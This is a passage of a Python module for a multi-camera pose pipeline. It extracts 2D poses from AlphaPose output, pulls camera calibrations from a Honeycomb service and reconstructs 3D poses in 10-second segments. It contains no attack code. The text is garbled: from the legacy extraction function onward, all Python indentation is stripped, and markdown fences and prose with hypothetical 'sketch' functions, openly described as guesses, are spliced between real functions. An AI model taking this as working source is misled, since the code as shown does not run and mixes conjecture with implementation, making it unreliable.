        start = start.replace(tzinfo=datetime.timezone.utc)
    if end.tzinfo is None:
        logger.info('Specified end is timezone-naive. Assuming UTC')
        end = end.replace(tzinfo=datetime.timezone.utc)
    logger.info('Extracting 2D poses from local Alphapose output. Base directory: {}. Alphapose data subdirectory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Start: {}. End: {}'.format(
        base_dir,
        alphapose_subdirectory,
        pose_processing_subdirectory,
        environment_id,
        start,
        end
    ))
    logger.info('Generating metadata')
    pose_extraction_2d_metadata = generate_metadata(
        environment_id=environment_id,
        pipeline_stage='pose_extraction_2d',
        parameters={
            'start': start,
            'end': end
        }
    )
    inference_id = pose_extraction_2d_metadata.get('inference_id')
    logger.info('Writing inference metadata to local file')
    process_pose_data.local_io.write_data_local(
        data_object=pose_extraction_2d_metadata,
        base_dir=base_dir,
        pipeline_stage='pose_extraction_2d',
        environment_id=environment_id,
        filename_stem='pose_extraction_2d_metadata',
        inference_id=pose_extraction_2d_metadata['inference_id'],
        time_segment_start=None,
        object_type='dict',
        append=False,
        sort_field=None,
        pose_processing_subdirectory=pose_processing_subdirectory
    )
    logger.info('Generating list of time segments')
    time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
        start=start,
        end=end
    )
    num_time_segments = len(time_segment_start_list)
    num_minutes = (end - start).total_seconds()/60
    if camera_assignment_ids is None:
        logger.info('Querying Honeycomb for cameras assigned to environment \'{}\' in the period {} to {}'.format(
            environment_id,
            start.isoformat(),
            end.isoformat()
        ))
        camera_info = honeycomb_io.fetch_camera_info(
            environment_id=environment_id,
            environment_name=None,
            start=start,
            end=end,
            chunk_size=100,
            client=client,
            uri=uri,
            token_uri=token_uri,
            audience=audience,
            client_id=client_id,
            client_secret=client_secret
        )
        camera_assignment_ids = camera_info['assignment_id'].unique().tolist()
    num_cameras = len(camera_assignment_ids)
    logger.info('Extracting 2D poses for {} cameras and {} time segments spanning {:.3f} minutes: {} to {}'.format(
        num_cameras,
        num_time_segments,
        num_minutes,
        time_segment_start_list[0].isoformat(),
        time_segment_start_list[-1].isoformat()
    ))
    processing_start = time.time()
    if task_progress_bar:
        if notebook:
            time_segment_start_iterator = tqdm.notebook.tqdm(time_segment_start_list)
        else:
            time_segment_start_iterator = tqdm.tqdm(time_segment_start_list)
    else:
        time_segment_start_iterator = time_segment_start_list
    previous_carryover_poses = None
    for time_segment_start in time_segment_start_iterator:
        current_poses, carryover_poses = process_pose_data.local_io.fetch_2d_pose_data_alphapose_local_time_segment(
            base_dir=base_dir,
            environment_id=environment_id,
            time_segment_start=time_segment_start,
            camera_assignment_ids=camera_assignment_ids,
            carryover_poses=previous_carryover_poses,
            alphapose_subdirectory=alphapose_subdirectory,
            tree_structure=tree_structure,
            filename=poses_2d_file_name,
            json_format=poses_2d_json_format
        )
        if previous_carryover_poses is not None and len(previous_carryover_poses) > 0:
            poses_2d_df_time_segment = (
                pd.concat((
                    previous_carryover_poses,
                    current_poses
                ))
                .sort_values(['timestamp', 'assignment_id'])
            )
        else:
            poses_2d_df_time_segment = current_poses
        process_pose_data.local_io.write_data_local(
            data_object=poses_2d_df_time_segment,
            base_dir=base_dir,
            pipeline_stage='pose_extraction_2d',
            environment_id=environment_id,
            filename_stem='poses_2d',
            inference_id=inference_id,
            time_segment_start=time_segment_start,
            object_type='dataframe',
            append=False,
            sort_field=None,
            pose_processing_subdirectory=pose_processing_subdirectory
        )
        previous_carryover_poses = carryover_poses
    processing_time = time.time() - processing_start
    logger.info('Extracted {:.3f} minutes of 2D poses in {:.3f} minutes (ratio of {:.3f})'.format(
        num_minutes,
        processing_time/60,
        (processing_time/60)/num_minutes
    ))
    return inference_id
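# The docstring above says output is organized into 10 second segments mirroring the
# source videos. A minimal sketch of what generate_time_segment_start_list presumably
# produces follows; this stand-in is an assumption for illustration, not the actual
# process_pose_data.local_io implementation.

```python
import datetime


def generate_time_segment_starts(start, end, segment_seconds=10):
    """Hypothetical sketch: start times of consecutive fixed-length segments covering [start, end)."""
    starts = []
    current = start
    while current < end:
        starts.append(current)
        current += datetime.timedelta(seconds=segment_seconds)
    return starts


segment_starts = generate_time_segment_starts(
    datetime.datetime(2021, 1, 1, 9, 0, 0, tzinfo=datetime.timezone.utc),
    datetime.datetime(2021, 1, 1, 9, 1, 0, tzinfo=datetime.timezone.utc),
)
assert len(segment_starts) == 6  # one segment start per 10 seconds in a one-minute window
```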
def extract_poses_2d_alphapose_local_by_time_segment_legacy(
start,
end,
base_dir,
environment_id,
alphapose_subdirectory='prepared',
tree_structure='file-per-frame',
poses_2d_file_name='alphapose-results.json',
poses_2d_json_format='cmu',
pose_processing_subdirectory='pose_processing',
task_progress_bar=False,
notebook=False
):
"""
Fetches 2D pose data from local Alphapose output and writes back to local files.
Input data is assumed to be organized according to standard Alphapose
pipeline output (see documentation for that pipeline).
Output data is organized into 10 second segments (mirroring source videos),
saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_extraction_2d/ENVIRONMENT_ID/YYYY/MM/DD/HH-MM-SS/poses_2d_INFERENCE_ID.pkl\'
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_extraction_2d/ENVIRONMENT_ID/pose_extraction_2d_metadata_INFERENCE_ID.pkl\'
Args:
start (datetime): Start of period to be analyzed
end (datetime): End of period to be analyzed
base_dir (str): Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
alphapose_subdirectory (str): subdirectory (under base directory) for Alphapose output (default is \'prepared\')
tree_structure (str): Organization of Alphapose output files (default is \'file-per-frame\')
poses_2d_file_name (str): Filename for Alphapose data in each directory (default is \'alphapose-results.json\')
poses_2d_json_format (str): Format of Alphapose results files (default is \'cmu\')
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
task_progress_bar (bool): Boolean indicating whether script should display a progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
if start.tzinfo is None:
logger.info('Specified start is timezone-naive. Assuming UTC')
start = start.replace(tzinfo=datetime.timezone.utc)
if end.tzinfo is None:
logger.info('Specified end is timezone-naive. Assuming UTC')
end = end.replace(tzinfo=datetime.timezone.utc)
logger.info('Extracting 2D poses from local Alphapose output. Base directory: {}. Alphapose data subdirectory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Start: {}. End: {}'.format(
base_dir,
alphapose_subdirectory,
pose_processing_subdirectory,
environment_id,
start,
end
))
logger.info('Generating metadata')
pose_extraction_2d_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='pose_extraction_2d',
parameters={
'start': start,
'end': end
}
)
inference_id = pose_extraction_2d_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=pose_extraction_2d_metadata,
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='pose_extraction_2d_metadata',
inference_id=pose_extraction_2d_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
logger.info('Extracting 2D poses for {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
processing_start = time.time()
if task_progress_bar:
if notebook:
time_segment_start_iterator = tqdm.notebook.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = tqdm.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = time_segment_start_list
for time_segment_start in time_segment_start_iterator:
poses_2d_df_time_segment = process_pose_data.local_io.fetch_2d_pose_data_alphapose_local_time_segment(
base_dir=base_dir,
environment_id=environment_id,
time_segment_start=time_segment_start,
alphapose_subdirectory=alphapose_subdirectory,
tree_structure=tree_structure,
filename=poses_2d_file_name,
json_format=poses_2d_json_format
)
process_pose_data.local_io.write_data_local(
data_object=poses_2d_df_time_segment,
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='poses_2d',
inference_id=inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
processing_time = time.time() - processing_start
logger.info('Extracted {:.3f} minutes of 2D poses in {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
return inference_id
def reconstruct_poses_3d_local_by_time_segment(
base_dir,
environment_id,
pose_extraction_2d_inference_id,
pose_model_id,
room_x_limits,
room_y_limits,
start=None,
end=None,
camera_assignment_ids=None,
camera_device_id_lookup=None,
camera_calibrations=None,
coordinate_space_id=None,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
pose_processing_subdirectory='pose_processing',
min_keypoint_quality=None,
min_num_keypoints=None,
min_pose_quality=None,
min_pose_pair_score=None,
max_pose_pair_score=25.0,
pose_pair_score_distance_method='pixels',
pose_pair_score_pixel_distance_scale=5.0,
pose_pair_score_summary_method='rms',
pose_3d_limits=None,
pose_3d_graph_initial_edge_threshold=2,
pose_3d_graph_max_dispersion=0.20,
include_track_labels=False,
parallel=False,
num_parallel_processes=None,
task_progress_bar=False,
segment_progress_bar=False,
notebook=False
):
"""
Fetches 2D pose data from local files, reconstructs 3D poses, and writes output back to local files.
If camera information is not specified, script pulls camera data from
Honeycomb based on environment ID, start time, and end time.
Options for pose pair score distance method are \'pixels\' (simple 2D distance
measured in pixels) or \'probability\' (likelihood of that distance assuming
2D Gaussian reprojection error).
Options for pose pair score summary method are \'rms\' (root mean square of
distances across keypoints) or \'sum\' (sum of distances across keypoints).
3D pose limits are an array with shape (2, NUM_KEYPOINTS, 3) specifying the
minimum and maximum possible coordinate values for each type of keypoint
(for filtering 3D poses). If these limits are not specified, script
calculates default limits based on room x and y limits and pose model.
Candidate 3D poses are validated and grouped into people using an adaptive
strategy. After initial pose filtering, the algorithm forms a graph with 2D
poses as nodes and candidate 3D poses as edges. This graph is then split
into k-edge-connected subgraphs (people), starting with the specified
initial k (i.e., if k > 1, each person must be confirmed by matches across
multiple cameras). If the spatial dispersion of the 3D poses for any
subgraph (person) exceeds the specified threshold (suggesting that multiple
people are being conflated), k is increased for that subgraph, effectively
splitting the subgraph. This process repeats until every subgraph (person)
either falls below the maximum spatial dispersion (a valid person) or can
no longer satisfy the required k (in which case its poses are rejected).
Input data is assumed to be organized as specified by
extract_poses_2d_alphapose_local_by_time_segment().
Output data is organized into 10 second segments (mirroring source videos),
saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_reconstruction_3d/ENVIRONMENT_ID/YYYY/MM/DD/HH-MM-SS/poses_3d_INFERENCE_ID.pkl\'
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_reconstruction_3d/ENVIRONMENT_ID/pose_reconstruction_3d_metadata_INFERENCE_ID.pkl\'
Args:
base_dir (str): Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_extraction_2d_inference_id (str): Inference ID for source data
pose_model_id (str): Honeycomb pose model ID for pose model that defines 2D/3D pose data structure
room_x_limits (sequence of float): Boundaries of room in x direction in [MIN, MAX] format (for filtering 3D poses)
room_y_limits (sequence of float): Boundaries of room in y direction in [MIN, MAX] format (for filtering 3D poses)
start (datetime): Start of period within source data to be analyzed (default is None)
end (datetime): End of period within source data to be analyzed (default is None)
camera_assignment_ids (sequence of str): List of camera assignment IDs to analyze (default is None)
camera_device_id_lookup (dict): Dict in format {ASSIGNMENT_ID: DEVICE_ID} (default is None)
camera_calibrations (dict): Dict in format {DEVICE_ID: CAMERA_CALIBRATION_DATA} (default is None)
coordinate_space_id (str): Coordinate space ID of extrinsic camera calibrations (and therefore 3D pose output) (default is None)
client (MinimalHoneycombClient): Honeycomb client (otherwise generates one) (default is None)
uri (str): Honeycomb URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
token_uri (str): Honeycomb token URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
audience (str): Honeycomb audience (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_id (str): Honeycomb client ID (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_secret (str): Honeycomb client secret (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
min_keypoint_quality (float): Minimum keypoint quality for keypoint to be included (default is None)
min_num_keypoints (int): Minimum number of keypoints (after keypoint quality filter) for 2D pose to be included (default is None)
min_pose_quality (float): Minimum pose quality for 2D pose to be included (default is None)
min_pose_pair_score (float): Minimum pose pair score for pose pair to be included (default is None)
max_pose_pair_score (float): Maximum pose pair score for pose pair to be included (default is 25.0)
pose_pair_score_distance_method (str): Method for calculating distance between original and reprojected pose keypoints (default is \'pixels\')
pose_pair_score_pixel_distance_scale (float): Pixel distance scale for \'probability\' method (default is 5.0)
pose_pair_score_summary_method (str): Method for summarizing reprojected keypoint distance over pose (default is \'rms\')
pose_3d_limits (array): Spatial limits for each type of pose keypoint (for filtering candidate 3D poses) (default is None)
pose_3d_graph_initial_edge_threshold (int): Minimum number of pose pairs in pose (edges in graph) (default is 2)
pose_3d_graph_max_dispersion (float): Keypoint dispersion threshold for increasing required number of edges (default is 0.20)
include_track_labels (bool): Boolean indicating whether to include source 2D track labels in 3D pose data (default is False)
parallel (bool): Boolean indicating whether to use multiple parallel processes (one for each time segment) (default is False)
num_parallel_processes (int): Number of parallel processes in pool (otherwise defaults to number of cores - 1) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
segment_progress_bar (bool): Boolean indicating whether script should display a progress bar for each time segment (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
pose_extraction_2d_metadata = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='pose_extraction_2d_metadata',
inference_ids=pose_extraction_2d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
if start is None:
start = pose_extraction_2d_metadata['parameters']['start']
if end is None:
end = pose_extraction_2d_metadata['parameters']['end']
if start.tzinfo is None:
logger.info('Specified start is timezone-naive. Assuming UTC')
start = start.replace(tzinfo=datetime.timezone.utc)
if end.tzinfo is None:
logger.info('Specified end is timezone-naive. Assuming UTC')
end = end.replace(tzinfo=datetime.timezone.utc)
logger.info('Reconstructing 3D poses from local 2D pose data. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Start: {}. End: {}'.format(
base_dir,
pose_processing_subdirectory,
environment_id,
start,
end
))
logger.info('Generating metadata')
if camera_assignment_ids is None:
logger.info('Camera assignment IDs not specified. Fetching camera assignment IDs from Honeycomb based on environment and time span')
camera_assignment_ids = honeycomb_io.fetch_camera_assignment_ids_from_environment(
start=start,
end=end,
environment_id=environment_id,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
if camera_device_id_lookup is None:
logger.info('Camera device ID lookup table not specified. Fetching camera device ID info from Honeycomb based on camera assignment IDs')
camera_device_id_lookup = honeycomb_io.fetch_camera_device_id_lookup(
assignment_ids=camera_assignment_ids,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
camera_device_ids = list(camera_device_id_lookup.values())
if camera_calibrations is None:
logger.info('Camera calibration parameters not specified. Fetching camera calibration parameters from Honeycomb based on camera device IDs and time span')
camera_calibrations = honeycomb_io.fetch_camera_calibrations(
camera_ids=camera_device_ids,
start=start,
end=end,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
if coordinate_space_id is None:
coordinate_space_id = extract_coordinate_space_id_from_camera_calibrations(camera_calibrations)
if pose_3d_limits is None:
logger.info('3D pose spatial limits not specified. Generating default spatial limits based on specified room spatial limits and specified pose model')
pose_3d_limits = generate_pose_3d_limits(
pose_model_id=pose_model_id,
room_x_limits=room_x_limits,
room_y_limits=room_y_limits,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
pose_reconstruction_3d_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='pose_reconstruction_3d',
parameters={
'pose_extraction_2d_inference_id': pose_extraction_2d_inference_id,
'start': start,
'end': end,
'pose_model_id': pose_model_id,
'room_x_limits': room_x_limits,
'room_y_limits': room_y_limits,
'camera_assignment_ids': camera_assignment_ids,
'camera_device_id_lookup': camera_device_id_lookup,
'camera_device_ids': camera_device_ids,
'camera_calibrations': camera_calibrations,
'coordinate_space_id': coordinate_space_id,
'min_keypoint_quality': min_keypoint_quality,
'min_num_keypoints': min_num_keypoints,
'min_pose_quality': min_pose_quality,
'min_pose_pair_score': min_pose_pair_score,
'max_pose_pair_score': max_pose_pair_score,
'pose_pair_score_distance_method': pose_pair_score_distance_method,
'pose_pair_score_pixel_distance_scale': pose_pair_score_pixel_distance_scale,
'pose_pair_score_summary_method': pose_pair_score_summary_method,
'pose_3d_limits': pose_3d_limits,
'pose_3d_graph_initial_edge_threshold': pose_3d_graph_initial_edge_threshold,
'pose_3d_graph_max_dispersion': pose_3d_graph_max_dispersion,
'include_track_labels': include_track_labels
}
)
inference_id = pose_reconstruction_3d_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=pose_reconstruction_3d_metadata,
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='pose_reconstruction_3d_metadata',
inference_id=pose_reconstruction_3d_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
logger.info('Reconstructing 3D poses for {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
reconstruct_poses_3d_alphapose_local_time_segment_partial = functools.partial(
reconstruct_poses_3d_alphapose_local_time_segment,
base_dir=base_dir,
environment_id=environment_id,
pose_extraction_2d_inference_id=pose_extraction_2d_inference_id,
pose_reconstruction_3d_inference_id=inference_id,
pose_processing_subdirectory=pose_processing_subdirectory,
camera_device_id_lookup=camera_device_id_lookup,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
camera_calibrations=camera_calibrations,
min_keypoint_quality=min_keypoint_quality,
min_num_keypoints=min_num_keypoints,
min_pose_quality=min_pose_quality,
min_pose_pair_score=min_pose_pair_score,
max_pose_pair_score=max_pose_pair_score,
pose_pair_score_distance_method=pose_pair_score_distance_method,
pose_pair_score_pixel_distance_scale=pose_pair_score_pixel_distance_scale,
pose_pair_score_summary_method=pose_pair_score_summary_method,
pose_3d_limits=pose_3d_limits,
room_x_limits=room_x_limits,
room_y_limits=room_y_limits,
pose_3d_graph_initial_edge_threshold=pose_3d_graph_initial_edge_threshold,
pose_3d_graph_max_dispersion=pose_3d_graph_max_dispersion,
include_track_labels=include_track_labels,
progress_bar=segment_progress_bar,
notebook=notebook
)
if (task_progress_bar or segment_progress_bar) and parallel and not notebook:
logger.warning('Progress bars may not display properly with parallel processing enabled outside of a notebook')
processing_start = time.time()
if parallel:
logger.info('Attempting to launch parallel processes')
if num_parallel_processes is None:
num_cpus = multiprocessing.cpu_count()
num_processes = num_cpus - 1
logger.info('Number of parallel processes not specified. {} CPUs detected. Launching {} processes'.format(
num_cpus,
num_processes
))
with multiprocessing.Pool(num_processes) as p:
if task_progress_bar:
if notebook:
list(tqdm.notebook.tqdm(
p.imap_unordered(
reconstruct_poses_3d_alphapose_local_time_segment_partial,
time_segment_start_list
),
total=len(time_segment_start_list)
))
else:
list(tqdm.tqdm(
p.imap_unordered(
reconstruct_poses_3d_alphapose_local_time_segment_partial,
time_segment_start_list
),
total=len(time_segment_start_list)
))
else:
list(
p.imap_unordered(
reconstruct_poses_3d_alphapose_local_time_segment_partial,
time_segment_start_list
)
)
else:
if task_progress_bar:
if notebook:
list(map(reconstruct_poses_3d_alphapose_local_time_segment_partial, tqdm.notebook.tqdm(time_segment_start_list)))
else:
list(map(reconstruct_poses_3d_alphapose_local_time_segment_partial, tqdm.tqdm(time_segment_start_list)))
else:
list(map(reconstruct_poses_3d_alphapose_local_time_segment_partial, time_segment_start_list))
processing_time = time.time() - processing_start
logger.info('Processed {:.3f} minutes of 2D poses in {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
return inference_id
def reconstruct_poses_3d_local_timestamp(
timestamp,
base_dir,
environment_id,
pose_extraction_2d_inference_id,
pose_model_id,
room_x_limits,
room_y_limits,
camera_assignment_ids=None,
camera_device_id_lookup=None,
camera_calibrations=None,
coordinate_space_id=None,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
pose_processing_subdirectory='pose_processing',
min_keypoint_quality=None,
min_num_keypoints=None,
min_pose_quality=None,
min_pose_pair_score=None,
max_pose_pair_score=25.0,
pose_pair_score_distance_method='pixels',
pose_pair_score_pixel_distance_scale=5.0,
pose_pair_score_summary_method='rms',
pose_3d_limits=None,
pose_3d_graph_initial_edge_threshold=2,
pose_3d_graph_max_dispersion=0.20,
include_track_labels=False,
return_diagnostics=False
):
if timestamp.tzinfo is None:
logger.info('Specified timestamp is timezone-naive. Assuming UTC')
timestamp = timestamp.replace(tzinfo=datetime.timezone.utc)
logger.info('Reconstructing 3D poses from local 2D pose data. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Timestamp: {}'.format(
base_dir,
pose_processing_subdirectory,
environment_id,
timestamp
))
if camera_assignment_ids is None:
logger.info('Camera assignment IDs not specified. Fetching camera assignment IDs from Honeycomb based on environment and time span')
camera_assignment_ids = honeycomb_io.fetch_camera_assignment_ids_from_environment(
start=timestamp,
end=timestamp,
environment_id=environment_id,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
if camera_device_id_lookup is None:
logger.info('Camera device ID lookup table not specified. Fetching camera device ID info from Honeycomb based on camera assignment IDs')
camera_device_id_lookup = honeycomb_io.fetch_camera_device_id_lookup(
assignment_ids=camera_assignment_ids,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
camera_device_ids = list(camera_device_id_lookup.values())
if camera_calibrations is None:
logger.info('Camera calibration parameters not specified. Fetching camera calibration parameters from Honeycomb based on camera device IDs and time span')
camera_calibrations = honeycomb_io.fetch_camera_calibrations(
camera_ids=camera_device_ids,
start=timestamp,
end=timestamp,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
if coordinate_space_id is None:
coordinate_space_id = extract_coordinate_space_id_from_camera_calibrations(camera_calibrations)
if pose_3d_limits is None:
logger.info('3D pose spatial limits not specified. Generating default spatial limits based on specified room spatial limits and specified pose model')
pose_3d_limits = generate_pose_3d_limits(
pose_model_id=pose_model_id,
room_x_limits=room_x_limits,
room_y_limits=room_y_limits,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=timestamp,
end=timestamp
)
if len(time_segment_start_list) != 1:
raise ValueError('Processing single timestamp but generated time segment start list of length {}'.format(
len(time_segment_start_list)
))
time_segment_start = time_segment_start_list[0]
logger.info('Processing 2D poses from local Alphapose output files for time segment starting at {}'.format(time_segment_start.isoformat()))
logger.info('Fetching 2D pose data for time segment starting at {}'.format(time_segment_start.isoformat()))
poses_2d_df_time_segment = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='poses_2d',
inference_ids=pose_extraction_2d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=time_segment_start,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
if len(poses_2d_df_time_segment) == 0:
logger.info('No 2D poses found for time segment starting at %s', time_segment_start.isoformat())
return
logger.info('Fetched 2D pose data for time segment starting at {}'.format(time_segment_start.isoformat()))
logger.info('Extracting 2D pose data for timestamp {}'.format(timestamp.isoformat()))
poses_2d_df_timestamp = poses_2d_df_time_segment.loc[poses_2d_df_time_segment['timestamp'] == timestamp].copy()
if len(poses_2d_df_timestamp) == 0:
logger.info('No 2D poses found for timestamp %s', timestamp.isoformat())
return
logger.info('Converting camera assignment IDs to camera device IDs for timestamp {}'.format(timestamp.isoformat()))
poses_2d_df_timestamp = process_pose_data.local_io.convert_assignment_ids_to_camera_device_ids(
poses_2d_df=poses_2d_df_timestamp,
camera_device_id_lookup=camera_device_id_lookup,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
logger.info('Converted camera assignment IDs to camera device IDs for timestamp {}'.format(timestamp.isoformat()))
camera_ids_in_data = poses_2d_df_timestamp['camera_id'].unique().tolist()
missing_cameras = list()
for camera_id in camera_ids_in_data:
for calibration_parameter in [
'camera_matrix',
'distortion_coefficients',
'rotation_vector',
'translation_vector'
]:
if camera_calibrations.get(camera_id, {}).get(calibration_parameter) is None:
logger.warning('Camera {} in data is missing calibration information. Excluding these poses.'.format(
camera_id
))
missing_cameras.append(camera_id)
break
if len(missing_cameras) > 0:
poses_2d_df_timestamp = poses_2d_df_timestamp.loc[~poses_2d_df_timestamp['camera_id'].isin(missing_cameras)]
poses_3d_df_timestamp = poseconnect.reconstruct.reconstruct_poses_3d_timestamp(
poses_2d_timestamp=poses_2d_df_timestamp,
camera_calibrations=camera_calibrations,
pose_3d_limits=pose_3d_limits,
min_keypoint_quality=min_keypoint_quality,
min_num_keypoints=min_num_keypoints,
min_pose_quality=min_pose_quality,
min_pose_pair_score=min_pose_pair_score,
max_pose_pair_score=max_pose_pair_score,
pose_pair_score_distance_method=pose_pair_score_distance_method,
pose_pair_score_pixel_distance_scale=pose_pair_score_pixel_distance_scale,
pose_pair_score_summary_method=pose_pair_score_summary_method,
pose_3d_graph_initial_edge_threshold=pose_3d_graph_initial_edge_threshold,
pose_3d_graph_max_dispersion=pose_3d_graph_max_dispersion,
include_track_labels=include_track_labels,
return_diagnostics=return_diagnostics
)
return poses_3d_df_timestamp
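The pose_3d_limits array described above has shape (2, NUM_KEYPOINTS, 3): per-keypoint minima and maxima for each coordinate. A hedged sketch of how such limits might be built from room x/y limits follows; the function name, the flat z range, and the uniform per-keypoint bounds are assumptions, not the actual generate_pose_3d_limits logic (which takes the pose model into account).

```python
import numpy as np

def sketch_pose_3d_limits(room_x_limits, room_y_limits, num_keypoints, z_limits=(0.0, 2.5)):
    # Hypothetical sketch: row 0 holds per-keypoint coordinate minima,
    # row 1 per-keypoint maxima, giving shape (2, NUM_KEYPOINTS, 3).
    minimum = np.tile([room_x_limits[0], room_y_limits[0], z_limits[0]], (num_keypoints, 1))
    maximum = np.tile([room_x_limits[1], room_y_limits[1], z_limits[1]], (num_keypoints, 1))
    return np.stack((minimum, maximum))

limits = sketch_pose_3d_limits([0.0, 8.0], [0.0, 10.0], num_keypoints=17)
# limits.shape == (2, 17, 3)
```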
def reconstruct_poses_3d_alphapose_local_time_segment(
time_segment_start,
base_dir,
environment_id,
pose_extraction_2d_inference_id,
pose_reconstruction_3d_inference_id,
pose_processing_subdirectory='pose_processing',
camera_device_id_lookup=None,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
camera_calibrations=None,
min_keypoint_quality=None,
min_num_keypoints=None,
min_pose_quality=None,
min_pose_pair_score=None,
max_pose_pair_score=25.0,
pose_pair_score_distance_method='pixels',
pose_pair_score_pixel_distance_scale=5.0,
pose_pair_score_summary_method='rms',
pose_3d_limits=None,
room_x_limits=None,
room_y_limits=None,
pose_3d_graph_initial_edge_threshold=2,
pose_3d_graph_max_dispersion=0.20,
include_track_labels=False,
progress_bar=False,
notebook=False
):
logger.info('Processing 2D poses from local Alphapose output files for time segment starting at {}'.format(time_segment_start.isoformat()))
logger.info('Fetching 2D pose data for time segment starting at {}'.format(time_segment_start.isoformat()))
poses_2d_df_time_segment = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='poses_2d',
inference_ids=pose_extraction_2d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=time_segment_start,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
if len(poses_2d_df_time_segment) == 0:
logger.info('No 2D poses found for time segment starting at %s', time_segment_start.isoformat())
return
logger.info('Fetched 2D pose data for time segment starting at {}'.format(time_segment_start.isoformat()))
if poses_2d_df_time_segment['timestamp'].min() < time_segment_start:
raise ValueError('First timestamp in 2D pose data for time segment starting at {} is {}, which is before start of time segment'.format(
time_segment_start.isoformat(),
poses_2d_df_time_segment['timestamp'].min().isoformat()
))
if poses_2d_df_time_segment['timestamp'].max() >= time_segment_start + datetime.timedelta(seconds=10):
